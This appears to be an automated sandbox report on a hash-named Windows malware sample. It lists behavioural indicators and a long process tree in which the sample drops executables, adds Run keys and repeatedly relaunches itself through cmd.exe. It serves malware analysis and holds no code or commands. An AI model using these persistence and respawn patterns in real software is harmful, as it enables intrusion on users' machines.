856	ff284a9fa89bfeb02e4ebab752065b79.exe
4924	ff284a9fa89bfeb02e4ebab752065b79.exe
4924	ff284a9fa89bfeb02e4ebab752065b79.exe
4924	ff284a9fa89bfeb02e4ebab752065b79.exe
4924	ff284a9fa89bfeb02e4ebab752065b79.exe
2060	ff284a9fa89bfeb02e4ebab752065b79.exe
2060	ff284a9fa89bfeb02e4ebab752065b79.exe
2060	ff284a9fa89bfeb02e4ebab752065b79.exe
2060	ff284a9fa89bfeb02e4ebab752065b79.exe
4616	ff284a9fa89bfeb02e4ebab752065b79.exe
4616	ff284a9fa89bfeb02e4ebab752065b79.exe
4616	ff284a9fa89bfeb02e4ebab752065b79.exe
4616	ff284a9fa89bfeb02e4ebab752065b79.exe
1216	ff284a9fa89bfeb02e4ebab752065b79.exe
1216	ff284a9fa89bfeb02e4ebab752065b79.exe
1216	ff284a9fa89bfeb02e4ebab752065b79.exe
1216	ff284a9fa89bfeb02e4ebab752065b79.exe
1124	ff284a9fa89bfeb02e4ebab752065b79.exe
1124	ff284a9fa89bfeb02e4ebab752065b79.exe
1124	ff284a9fa89bfeb02e4ebab752065b79.exe
1124	ff284a9fa89bfeb02e4ebab752065b79.exe
2924	ff284a9fa89bfeb02e4ebab752065b79.exe
2924	ff284a9fa89bfeb02e4ebab752065b79.exe
2924	ff284a9fa89bfeb02e4ebab752065b79.exe
2924	ff284a9fa89bfeb02e4ebab752065b79.exe
3208	ff284a9fa89bfeb02e4ebab752065b79.exe
3208	ff284a9fa89bfeb02e4ebab752065b79.exe
3208	ff284a9fa89bfeb02e4ebab752065b79.exe
3208	ff284a9fa89bfeb02e4ebab752065b79.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

UQwsoogU.exe

pid process

3688 UQwsoogU.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

UQwsoogU.exe

pid	process
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe
3688	UQwsoogU.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ff284a9fa89bfeb02e4ebab752065b79.execmd.execmd.exeff284a9fa89bfeb02e4ebab752065b79.execmd.exeff284a9fa89bfeb02e4ebab752065b79.execmd.execmd.exe

description	pid	process	target process
PID 4232 wrote to memory of 3688	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	UQwsoogU.exe
PID 4232 wrote to memory of 3688	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	UQwsoogU.exe
PID 4232 wrote to memory of 3688	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	UQwsoogU.exe
PID 4232 wrote to memory of 1140	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	emsYwAII.exe
PID 4232 wrote to memory of 1140	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	emsYwAII.exe
PID 4232 wrote to memory of 1140	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	emsYwAII.exe
PID 4232 wrote to memory of 4880	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 4232 wrote to memory of 4880	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 4232 wrote to memory of 4880	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 4880 wrote to memory of 2396	4880	cmd.exe	ff284a9fa89bfeb02e4ebab752065b79.exe
PID 4880 wrote to memory of 2396	4880	cmd.exe	ff284a9fa89bfeb02e4ebab752065b79.exe
PID 4880 wrote to memory of 2396	4880	cmd.exe	ff284a9fa89bfeb02e4ebab752065b79.exe
PID 4232 wrote to memory of 1268	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 1268	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 1268	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 220	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 220	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 220	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 232	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 232	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 232	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 4232 wrote to memory of 3652	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 4232 wrote to memory of 3652	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 4232 wrote to memory of 3652	4232	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3652 wrote to memory of 884	3652	cmd.exe	cscript.exe
PID 3652 wrote to memory of 884	3652	cmd.exe	cscript.exe
PID 3652 wrote to memory of 884	3652	cmd.exe	cscript.exe
PID 2396 wrote to memory of 1624	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 2396 wrote to memory of 1624	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 2396 wrote to memory of 1624	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 1624 wrote to memory of 3720	1624	cmd.exe	ff284a9fa89bfeb02e4ebab752065b79.exe
PID 1624 wrote to memory of 3720	1624	cmd.exe	ff284a9fa89bfeb02e4ebab752065b79.exe
PID 1624 wrote to memory of 3720	1624	cmd.exe	ff284a9fa89bfeb02e4ebab752065b79.exe
PID 2396 wrote to memory of 812	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 812	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 812	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 1688	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 1688	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 1688	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 5004	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 5004	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 5004	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 2396 wrote to memory of 3232	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 2396 wrote to memory of 3232	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 2396 wrote to memory of 3232	2396	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3720 wrote to memory of 3240	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3720 wrote to memory of 3240	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3720 wrote to memory of 3240	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3232 wrote to memory of 2764	3232	cmd.exe	cscript.exe
PID 3232 wrote to memory of 2764	3232	cmd.exe	cscript.exe
PID 3232 wrote to memory of 2764	3232	cmd.exe	cscript.exe
PID 3720 wrote to memory of 1604	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 1604	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 1604	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 3980	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 3980	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 3980	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 4964	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 4964	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 4964	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	reg.exe
PID 3720 wrote to memory of 1516	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3720 wrote to memory of 1516	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3720 wrote to memory of 1516	3720	ff284a9fa89bfeb02e4ebab752065b79.exe	cmd.exe
PID 3240 wrote to memory of 4608	3240	cmd.exe	ff284a9fa89bfeb02e4ebab752065b79.exe

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
"C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4232

C:\Users\Admin\psUMYAEE\UQwsoogU.exe
"C:\Users\Admin\psUMYAEE\UQwsoogU.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3688

C:\ProgramData\JmQYYYko\emsYwAII.exe
"C:\ProgramData\JmQYYYko\emsYwAII.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
2⤵
- Suspicious use of WriteProcessMemory
PID:4880

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
4⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
6⤵
- Suspicious use of WriteProcessMemory
PID:3240

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
8⤵
PID:2252

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
10⤵
PID:3780

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:4908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
12⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
13⤵
- Suspicious behavior: EnumeratesProcesses
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
14⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
15⤵
- Suspicious behavior: EnumeratesProcesses
PID:2156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
16⤵
PID:2276

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
17⤵
- Suspicious behavior: EnumeratesProcesses
PID:856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
18⤵
PID:4508

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
19⤵
- Suspicious behavior: EnumeratesProcesses
PID:4924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
20⤵
PID:4552

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
21⤵
- Suspicious behavior: EnumeratesProcesses
PID:2060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
22⤵
PID:3020

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
23⤵
- Suspicious behavior: EnumeratesProcesses
PID:4616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
24⤵
PID:2312

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
25⤵
- Suspicious behavior: EnumeratesProcesses
PID:1216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
26⤵
PID:3360

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
27⤵
- Suspicious behavior: EnumeratesProcesses
PID:1124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
28⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
29⤵
- Suspicious behavior: EnumeratesProcesses
PID:2924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
30⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
31⤵
- Suspicious behavior: EnumeratesProcesses
PID:3208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
32⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
33⤵
PID:492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
34⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
35⤵
PID:3648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
36⤵
PID:3532

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
37⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
38⤵
PID:1800

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
39⤵
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
40⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
41⤵
PID:1996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
42⤵
PID:1164

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
43⤵
PID:996

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
43⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
44⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
45⤵
PID:1512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
46⤵
PID:3756

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
47⤵
PID:1928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
48⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
49⤵
PID:4396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
50⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
51⤵
PID:1044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
52⤵
PID:856

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
53⤵
PID:3692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
54⤵
PID:4064

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
55⤵
PID:2068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
56⤵
PID:844

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
57⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
57⤵
PID:2612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
58⤵
PID:4400

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
59⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
60⤵
PID:1216

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
61⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
61⤵
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
62⤵
PID:3172

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
63⤵
PID:1996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
64⤵
PID:3732

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
65⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
66⤵
PID:1412

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
67⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
68⤵
PID:1756

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
69⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
70⤵
PID:4592

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
71⤵
PID:4128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
72⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
73⤵
PID:2340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
74⤵
PID:1600

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
75⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
76⤵
PID:4752

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
77⤵
PID:1244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
78⤵
PID:5088

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
79⤵
PID:4972

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
79⤵
PID:1412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
80⤵
PID:3756

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
81⤵
PID:2428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
82⤵
PID:2488

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
83⤵
PID:2572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
84⤵
PID:3320

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
85⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
86⤵
PID:4960

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
87⤵
PID:8

C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe
C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79
87⤵
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79"
88⤵
PID:4496

